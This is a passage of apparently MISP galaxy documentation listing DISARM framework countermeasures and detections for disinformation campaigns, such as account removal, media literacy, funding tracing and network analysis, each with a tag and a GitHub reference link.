Shift from reactive to proactive response, with priority on sharing relevant information with the public and mobilising private-sector engagement. Recent advances in data-driven technologies have elevated information as a source of power to influence the political and economic environment, to foster economic growth, to enable a decision-making advantage over competitors, and to communicate securely and quickly.

The tag is: misp-galaxy:disarm-countermeasures="elevate information as a critical domain of statecraft"

Table 1135. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00170.md

social media source removal

Removing accounts, pages, groups, e.g. facebook page removal

The tag is: misp-galaxy:disarm-countermeasures="social media source removal"

Table 1136. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00172.md

Create a healthier news environment

Free and fair press: create bipartisan, patriotic commitment to press freedom. Note difference between news and editorialising. Build alternative news sources: create alternative local-language news sources to counter local-language propaganda outlets. Delegitimize the 24 hour news cycle. includes Provide an alternative to disinformation content by expanding and improving local content: Develop content that can displace geopolitically-motivated narratives in the entire media environment, both new and old media alike.

The tag is: misp-galaxy:disarm-countermeasures="Create a healthier news environment"

Table 1137. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00174.md

Improve Coordination amongst stakeholders: public and private

Coordinated disinformation challenges are increasingly multidisciplinary, there are few organisations within the national security structures that are equipped with the broad-spectrum capability to effectively counter large-scale conflict short of war tactics in real-time. Institutional hurdles currently impede diverse subject matter experts, hailing from outside of the traditional national security and foreign policy disciplines (e.g., physical science, engineering, media, legal, and economics fields), from contributing to the direct development of national security countermeasures to emerging conflict short of war threat vectors. A Cognitive Security Action Group (CSAG), akin to the Counterterrorism Security Group (CSG), could drive interagency alignment across equivalents of DHS, DoS, DoD, Intelligence Community, and other implementing agencies, in areas including strategic narrative, and the nexus of cyber and information operations.

The tag is: misp-galaxy:disarm-countermeasures="Improve Coordination amongst stakeholders: public and private"

Table 1138. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00176.md

Fill information voids with non-disinformation content

1) Pollute the data voids with wholesome content (Kittens! Babyshark!). 2) fill data voids with relevant information, e.g. increase Russian-language programming in areas subject to Russian disinformation.

The tag is: misp-galaxy:disarm-countermeasures="Fill information voids with non-disinformation content"

Table 1139. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00178.md

Redirection / malware detection/ remediation

Detect redirction or malware, then quarantine or delete.

The tag is: misp-galaxy:disarm-countermeasures="Redirection / malware detection/ remediation"

Table 1140. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00182.md

Media exposure

highlight misinformation activities and actors in media

The tag is: misp-galaxy:disarm-countermeasures="Media exposure"

Table 1141. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00184.md

Newsroom/Journalist training to counter influence moves

Includes SEO influence. Includes promotion of a “higher standard of journalism”: journalism training “would be helpful, especially for the online community. Includes Strengthen local media: Improve effectiveness of local media outlets.

The tag is: misp-galaxy:disarm-countermeasures="Newsroom/Journalist training to counter influence moves"

Table 1142. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00188.md

Ensure that platforms are taking down flagged accounts

Use ongoing analysis/monitoring of "flagged" profiles. Confirm whether platforms are actively removing flagged accounts, and raise pressure via e.g. government organisations to encourage removal

The tag is: misp-galaxy:disarm-countermeasures="Ensure that platforms are taking down flagged accounts"

Table 1143. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00189.md

open engagement with civil society

Government open engagement with civil society as an independent check on government action and messaging. Government seeks to coordinate and synchronise narrative themes with allies and partners while calibrating action in cases where elements in these countries may have been co-opted by competitor nations. Includes “fight in the light”: Use leadership in the arts, entertainment, and media to highlight and build on fundamental tenets of democracy.

The tag is: misp-galaxy:disarm-countermeasures="open engagement with civil society"

Table 1144. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00190.md

Redirect searches away from disinformation or extremist content

Use Google AdWords to identify instances in which people search Google about particular fake-news stories or propaganda themes. Includes Monetize centrist SEO by subsidising the difference in greater clicks towards extremist content.

The tag is: misp-galaxy:disarm-countermeasures="Redirect searches away from disinformation or extremist content"

Table 1145. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00195.md

remove suspicious accounts

Standard reporting for false profiles (identity issues). Includes detecting hijacked accounts and reallocating them - if possible, back to original owners.

The tag is: misp-galaxy:disarm-countermeasures="remove suspicious accounts"

Table 1146. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00197.md

Respected figure (influencer) disavows misinfo

FIXIT: standardise language used for influencer/ respected figure.

The tag is: misp-galaxy:disarm-countermeasures="Respected figure (influencer) disavows misinfo"

Table 1147. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00200.md

Set data 'honeytraps'

Set honeytraps in content likely to be accessed for disinformation.

The tag is: misp-galaxy:disarm-countermeasures="Set data 'honeytraps'"

Table 1148. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00202.md

Stop offering press credentials to propaganda outlets

Remove access to official press events from known misinformation actors.

The tag is: misp-galaxy:disarm-countermeasures="Stop offering press credentials to propaganda outlets"

Table 1149. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00203.md

strong dialogue between the federal government and private sector to encourage better reporting

Increase civic resilience by partnering with business community to combat grey zone threats and ensuring adequate reporting and enforcement mechanisms.

The tag is: misp-galaxy:disarm-countermeasures="strong dialogue between the federal government and private sector to encourage better reporting"

Table 1150. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00205.md

The tag is: misp-galaxy:disarm-countermeasures="Run a competing disinformation campaign - not recommended"

Table 1151. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00207.md

Use humorous counter-narratives

The tag is: misp-galaxy:disarm-countermeasures="Use humorous counter-narratives"

Table 1152. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00211.md

build public resilience by making civil society more vibrant

Increase public service experience, and support wider civics and history education.

The tag is: misp-galaxy:disarm-countermeasures="build public resilience by making civil society more vibrant"

Table 1153. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00212.md

Use advertiser controls to stem flow of funds to bad actors

Prevent ad revenue going to disinformation domains

The tag is: misp-galaxy:disarm-countermeasures="Use advertiser controls to stem flow of funds to bad actors"

Table 1154. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00216.md

Add metadata to content that’s out of the control of disinformation creators

Steganography. Adding date, signatures etc to stop issue of photo relabelling etc.

The tag is: misp-galaxy:disarm-countermeasures="Add metadata to content that’s out of the control of disinformation creators"

Table 1155. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00219.md

Develop a monitoring and intelligence plan

Create a plan for misinformation and disinformation response, before it’s needed. Include connections / contacts needed, expected counteremessages etc.

The tag is: misp-galaxy:disarm-countermeasures="Develop a monitoring and intelligence plan"

Table 1156. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00220.md

Run a disinformation red team, and design mitigation factors

Include PACE plans - Primary, Alternate, Contingency, Emergency

The tag is: misp-galaxy:disarm-countermeasures="Run a disinformation red team, and design mitigation factors"

Table 1157. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00221.md

Tabletop simulations

Simulate misinformation and disinformation campaigns, and responses to them, before campaigns happen.

The tag is: misp-galaxy:disarm-countermeasures="Tabletop simulations"

Table 1158. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00222.md

Strengthen Trust in social media platforms

Improve trust in the misinformation responses from social media and other platforms. Examples include creating greater transparancy on their actions and algorithms.

The tag is: misp-galaxy:disarm-countermeasures="Strengthen Trust in social media platforms"

Table 1159. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/counters/C00223.md

Detections

DISARM is a framework designed for describing and understanding disinformation incidents..

Detections is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

DISARM Project

Analyse aborted / failed campaigns

Examine failed campaigns. How did they fail? Can we create useful activities that increase these failures?

The tag is: misp-galaxy:disarm-detections="Analyse aborted / failed campaigns"

Table 1160. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00001.md

Analyse viral fizzle

We have no idea what this means. Is it something to do with the way a viral story spreads?

The tag is: misp-galaxy:disarm-detections="Analyse viral fizzle"

Table 1161. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00002.md

Exploit counter-intelligence vs bad actors

The tag is: misp-galaxy:disarm-detections="Exploit counter-intelligence vs bad actors"

Table 1162. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00003.md

Recruit like-minded converts "people who used to be in-group"

The tag is: misp-galaxy:disarm-detections="Recruit like-minded converts "people who used to be in-group""

Table 1163. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00004.md

SWOT Analysis of Cognition in Various Groups

Strengths, Weaknesses, Opportunities, Threats analysis of groups and audience segments.

The tag is: misp-galaxy:disarm-detections="SWOT Analysis of Cognition in Various Groups"

Table 1164. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00005.md

SWOT analysis of tech platforms

The tag is: misp-galaxy:disarm-detections="SWOT analysis of tech platforms"

Table 1165. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00006.md

Monitor account level activity in social networks

The tag is: misp-galaxy:disarm-detections="Monitor account level activity in social networks"

Table 1166. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00007.md

Detect abnormal amplification

The tag is: misp-galaxy:disarm-detections="Detect abnormal amplification"

Table 1167. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00008.md

Detect abnormal events

The tag is: misp-galaxy:disarm-detections="Detect abnormal events"

Table 1168. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00009.md

Detect abnormal groups

The tag is: misp-galaxy:disarm-detections="Detect abnormal groups"

Table 1169. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00010.md

Detect abnormal pages

The tag is: misp-galaxy:disarm-detections="Detect abnormal pages"

Table 1170. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00011.md

Detect abnormal profiles, e.g. prolific pages/ groups/ people

The tag is: misp-galaxy:disarm-detections="Detect abnormal profiles, e.g. prolific pages/ groups/ people"

Table 1171. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00012.md

Identify fake news sites

The tag is: misp-galaxy:disarm-detections="Identify fake news sites"

Table 1172. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00013.md

Trace connections

for e.g. fake news sites

The tag is: misp-galaxy:disarm-detections="Trace connections"

Table 1173. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00014.md

Detect anomalies in membership growth patterns

I include Fake Experts as they may use funding campaigns such as Patreon to fund their operations and so these should be watched.

The tag is: misp-galaxy:disarm-detections="Detect anomalies in membership growth patterns"

Table 1174. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00015.md

Identify fence-sitters

Note: In each case, depending on the platform there may be a way to identify a fence-sitter. For example, online polls may have a neutral option or a "somewhat this-or-that" option, and may reveal who voted for that to all visitors. This information could be of use to data analysts. In TA08-11, the engagement level of victims could be identified to detect and respond to increasing engagement.

The tag is: misp-galaxy:disarm-detections="Identify fence-sitters"

Table 1175. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00016.md

Measure emotional valence

The tag is: misp-galaxy:disarm-detections="Measure emotional valence"

Table 1176. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00017.md

Follow the money

track funding sources

The tag is: misp-galaxy:disarm-detections="Follow the money"

Table 1177. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00018.md

Activity resurgence detection (alarm when dormant accounts become activated)

The tag is: misp-galaxy:disarm-detections="Activity resurgence detection (alarm when dormant accounts become activated)"

Table 1178. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00019.md

Detect anomalous activity

The tag is: misp-galaxy:disarm-detections="Detect anomalous activity"

Table 1179. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00020.md

AI/ML automated early detection of campaign planning

The tag is: misp-galaxy:disarm-detections="AI/ML automated early detection of campaign planning"

Table 1180. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00021.md

Digital authority - regulating body (united states)

The tag is: misp-galaxy:disarm-detections="Digital authority - regulating body (united states)"

Table 1181. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00022.md

Periodic verification (counter to hijack legitimate account)

The tag is: misp-galaxy:disarm-detections="Periodic verification (counter to hijack legitimate account)"

Table 1182. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00023.md

Teach civics to kids/ adults/ seniors

The tag is: misp-galaxy:disarm-detections="Teach civics to kids/ adults/ seniors"

Table 1183. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00024.md

Boots-on-the-ground early narrative detection

The tag is: misp-galaxy:disarm-detections="Boots-on-the-ground early narrative detection"

Table 1184. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00025.md

Language anomoly detection

The tag is: misp-galaxy:disarm-detections="Language anomoly detection"

Table 1185. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00026.md

Unlikely correlation of sentiment on same topics

The tag is: misp-galaxy:disarm-detections="Unlikely correlation of sentiment on same topics"

Table 1186. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00027.md

Associate a public key signature with government documents

The tag is: misp-galaxy:disarm-detections="Associate a public key signature with government documents"

Table 1187. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00028.md

Detect proto narratives, i.e. RT, Sputnik

The tag is: misp-galaxy:disarm-detections="Detect proto narratives, i.e. RT, Sputnik"

Table 1188. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00029.md

Early detection and warning - reporting of suspect content

The tag is: misp-galaxy:disarm-detections="Early detection and warning - reporting of suspect content"

Table 1189. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00030.md

Educate on how to identify information pollution

Strategic planning included as innoculating population has strategic value.

The tag is: misp-galaxy:disarm-detections="Educate on how to identify information pollution"

Table 1190. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00031.md

Educate on how to identify to pollution

DUPLICATE - DELETE

The tag is: misp-galaxy:disarm-detections="Educate on how to identify to pollution"

Table 1191. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00032.md

Fake websites: add transparency on business model

The tag is: misp-galaxy:disarm-detections="Fake websites: add transparency on business model"

Table 1192. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00033.md

Flag the information spaces so people know about active flooding effort

The tag is: misp-galaxy:disarm-detections="Flag the information spaces so people know about active flooding effort"

Table 1193. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00034.md

Identify repeated narrative DNA

The tag is: misp-galaxy:disarm-detections="Identify repeated narrative DNA"

Table 1194. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00035.md

Looking for AB testing in unregulated channels

The tag is: misp-galaxy:disarm-detections="Looking for AB testing in unregulated channels"

Table 1195. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00036.md

News content provenance certification.

Original Comment: Shortcomings: intentional falsehood. Doesn’t solve accuracy. Can’t be mandatory. Technique should be in terms of "strategic innoculation", raising the standards of what people expect in terms of evidence when consuming news.

The tag is: misp-galaxy:disarm-detections="News content provenance certification."

Table 1196. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00037.md

Social capital as attack vector

Unsure I understood the original intention or what it applied to. Therefore the techniques listed (10, 39, 43, 57, 61) are under my interpretation - which is that we want to track ignorant agents who fall into the enemy’s trap and show a cost to financing/reposting/helping the adversary via public shaming or other means.

The tag is: misp-galaxy:disarm-detections="Social capital as attack vector"

Table 1197. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00038.md

standards to track image/ video deep fakes - industry

The tag is: misp-galaxy:disarm-detections="standards to track image/ video deep fakes - industry"

Table 1198. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00039.md

Unalterable metadata signature on origins of image and provenance

The tag is: misp-galaxy:disarm-detections="Unalterable metadata signature on origins of image and provenance"

Table 1199. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00040.md

Bias detection

Not technically left of boom

The tag is: misp-galaxy:disarm-detections="Bias detection"

Table 1200. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00041.md

Categorise polls by intent

Use T00029, but against the creators

The tag is: misp-galaxy:disarm-detections="Categorise polls by intent"

Table 1201. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00042.md

Monitor for creation of fake known personas

Platform companies and some information security companies (e.g. ZeroFox) do this.

The tag is: misp-galaxy:disarm-detections="Monitor for creation of fake known personas"

Table 1202. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00043.md

Forensic analysis

Can be used in all phases for all techniques.

The tag is: misp-galaxy:disarm-detections="Forensic analysis"

Table 1203. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00044.md

Forensic linguistic analysis

Can be used in all phases for all techniques.

The tag is: misp-galaxy:disarm-detections="Forensic linguistic analysis"

Table 1204. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00045.md

Pump priming analytics

The tag is: misp-galaxy:disarm-detections="Pump priming analytics"

Table 1205. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00046.md

trace involved parties

The tag is: misp-galaxy:disarm-detections="trace involved parties"

Table 1206. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00047.md

Trace known operations and connection

The tag is: misp-galaxy:disarm-detections="Trace known operations and connection"

Table 1207. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00048.md

trace money

The tag is: misp-galaxy:disarm-detections="trace money"

Table 1208. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00049.md

Web cache analytics

The tag is: misp-galaxy:disarm-detections="Web cache analytics"

Table 1209. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00050.md

Challenge expertise

The tag is: misp-galaxy:disarm-detections="Challenge expertise"

Table 1210. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00051.md

Discover sponsors

Discovering the sponsors behind a campaign, narrative, bot, a set of accounts, or a social media comment, or anything else is useful.

The tag is: misp-galaxy:disarm-detections="Discover sponsors"

Table 1211. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00052.md

Government rumour control office (what can we learn?)

The tag is: misp-galaxy:disarm-detections="Government rumour control office (what can we learn?)"

Table 1212. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00053.md

Restrict people who can @ you on social networks

The tag is: misp-galaxy:disarm-detections="Restrict people who can @ you on social networks"

Table 1213. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00054.md

Verify credentials

The tag is: misp-galaxy:disarm-detections="Verify credentials"

Table 1214. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00055.md

Verify organisation legitimacy

The tag is: misp-galaxy:disarm-detections="Verify organisation legitimacy"

Table 1215. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00056.md

Verify personal credentials of experts

The tag is: misp-galaxy:disarm-detections="Verify personal credentials of experts"

Table 1216. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00057.md

Deplatform (cancel culture)

*Deplatform People: This technique needs to be a bit more specific to distinguish it from "account removal" or DDOS and other techniques that get more specific when applied to content. For example, other ways of deplatforming people include attacking their sources of funds, their allies, their followers, etc.

The tag is: misp-galaxy:disarm-detections="Deplatform (cancel culture)"

Table 1217. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00058.md

Identify susceptible demographics

All techniques provide or are susceptible to being countered by, or leveraged for, knowledge about user demographics.

The tag is: misp-galaxy:disarm-detections="Identify susceptible demographics"

Table 1218. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00059.md

Identify susceptible influencers

I assume this was a transcript error. Otherwise, "Identify Susceptible Influences" as in the various methods of influences that may work against a victim could also be a technique. Nope, wasn’t a transcript error: original note says influencers, as in find people of influence that might be targetted.

The tag is: misp-galaxy:disarm-detections="Identify susceptible influencers"

Table 1219. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00060.md

Microtargeting

The tag is: misp-galaxy:disarm-detections="Microtargeting"

Table 1220. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00061.md

Detect when Dormant account turns active

The tag is: misp-galaxy:disarm-detections="Detect when Dormant account turns active"

Table 1221. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00062.md

Linguistic change analysis

The tag is: misp-galaxy:disarm-detections="Linguistic change analysis"

Table 1222. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00063.md

Monitor reports of account takeover

The tag is: misp-galaxy:disarm-detections="Monitor reports of account takeover"

Table 1223. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00064.md

Sentiment change analysis

The tag is: misp-galaxy:disarm-detections="Sentiment change analysis"

Table 1224. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00065.md

Use language errors, time to respond to account bans and lawsuits, to indicate capabilities

The tag is: misp-galaxy:disarm-detections="Use language errors, time to respond to account bans and lawsuits, to indicate capabilities"

Table 1225. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00066.md

Data forensics

The tag is: misp-galaxy:disarm-detections="Data forensics"

Table 1226. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00067.md

Resonance analysis

a developing methodology for identifying statistical differences in how social groups use language and quantifying how common those statistical differences are within a larger population. In essence, it hypothesises how much affinity might exist for a specific group within a general population, based on the language its members employ

The tag is: misp-galaxy:disarm-detections="Resonance analysis"

Table 1227. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00068.md

Track Russian media and develop analytic methods.

To effectively counter Russian propaganda, it will be critical to track Russian influence efforts. The information requirements are varied and include the following: • Identify fake-news stories and their sources. • Understand narrative themes and content that pervade various Russian media sources. • Understand the broader Russian strategy that underlies tactical propaganda messaging.

The tag is: misp-galaxy:disarm-detections="Track Russian media and develop analytic methods."

Table 1228. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00069.md

Full spectrum analytics

The tag is: misp-galaxy:disarm-detections="Full spectrum analytics"

Table 1229. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00070.md

Network analysis Identify/cultivate/support influencers

Local influencers detected via Twitter networks are likely local influencers in other online and off-line channels as well. In addition, the content and themes gleaned from Russia and Russia-supporting populations, as well as anti-Russia activists, likely swirl in other online and off-line mediums as well.

The tag is: misp-galaxy:disarm-detections="Network analysis Identify/cultivate/support influencers"

Table 1230. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00071.md

network analysis to identify central users in the pro-Russia activist community.

It is possible that some of these are bots or trolls and could be flagged for suspension for violating Twitter’s terms of service.

The tag is: misp-galaxy:disarm-detections="network analysis to identify central users in the pro-Russia activist community."

Table 1231. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00072.md

collect intel/recon on black/covert content creators/manipulators

Players at the level of covert attribution, referred to as “black” in the grayscale of deniability, produce content on user-generated media, such as YouTube, but also add fear-mongering commentary to and amplify content produced by others and supply exploitable content to data dump websites. These activities are conducted by a network of trolls, bots, honeypots, and hackers.

The tag is: misp-galaxy:disarm-detections="collect intel/recon on black/covert content creators/manipulators"

Table 1232. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00073.md

identify relevant fence-sitter communities

brand ambassador programmes could be used with influencers across a variety of social media channels. It could also target other prominent experts, such as academics, business leaders, and other potentially prominent people. Authorities must ultimately take care in implementing such a programme given the risk that contact with U.S. or NATO authorities might damage influencer reputations. Engagements must consequently be made with care, and, if possible, government interlocutors should work through local NGOs.

The tag is: misp-galaxy:disarm-detections="identify relevant fence-sitter communities"

Table 1233. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00074.md

leverage open-source information

significant amounts of quality open-source information are now available and should be leveraged to build products and analysis prior to problem prioritisation in the areas of observation, attribution, and intent. Successfully distinguishing the grey zone campaign signal through the global noise requires action through the entirety of the national security community. Policy, process, and tools must all adapt and evolve to detect, discern, and act upon a new type of signal

The tag is: misp-galaxy:disarm-detections="leverage open-source information"

Table 1234. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00075.md

Monitor/collect audience engagement data connected to “useful idiots”

Target audience connected to "useful idiots rather than the specific profiles because - The active presence of such sources complicates targeting of Russian propaganda, given that it is often difficult to discriminate between authentic views and opinions on the internet and those disseminated by the Russian state.

The tag is: misp-galaxy:disarm-detections="Monitor/collect audience engagement data connected to “useful idiots”"

Table 1235. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00076.md

Model for bot account behaviour

Bot account: action based, people. Unsure which DISARM techniques.

The tag is: misp-galaxy:disarm-detections="Model for bot account behaviour"

Table 1236. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00077.md

Network anomaly detection

The tag is: misp-galaxy:disarm-detections="Network anomaly detection"

Table 1237. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00079.md

Hack the polls/ content yourself

Two wrongs don’t make a right? But if you hack your own polls, you do learn how it could be done, and learn what to look for

The tag is: misp-galaxy:disarm-detections="Hack the polls/ content yourself"

Table 1238. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00080.md

Need way for end user to report operations

The tag is: misp-galaxy:disarm-detections="Need way for end user to report operations"

Table 1239. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00081.md

Control the US "slang" translation boards

The tag is: misp-galaxy:disarm-detections="Control the US "slang" translation boards"

Table 1240. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00082.md

Build and own meme generator, then track and watermark contents

The tag is: misp-galaxy:disarm-detections="Build and own meme generator, then track and watermark contents"

Table 1241. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00083.md

Track individual bad actors

The tag is: misp-galaxy:disarm-detections="Track individual bad actors"

Table 1242. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00084.md

detection of a weak signal through global noise

Grey zone threats are challenging given that warning requires detection of a weak signal through global noise and across threat vectors and regional boundaries.Three interconnected grey zone elements characterise the nature of the activity: Temporality: The nature of grey zone threats truly requires a “big picture view” over long timescales and across regions and functional topics. Attribution: requiring an “almost certain” or “nearly certain analytic assessment before acting costs time and analytic effort Intent: judgement of adversarial intent to conduct grey zone activity. Indeed, the purpose of countering grey zone threats is to deter adversaries from fulfilling their intent to act. While attribution is one piece of the puzzle, closing the space around intent often means synthesising multiple relevant indicators and warnings, including the state’s geopolitical ambitions, military ties, trade and investment, level of corruption, and media landscape, among others.

The tag is: misp-galaxy:disarm-detections="detection of a weak signal through global noise"

Table 1243. Table References

Links

https://github.com/DISARMFoundation/DISARMframeworks/blob/main/generated_pages/detections/F00085.md

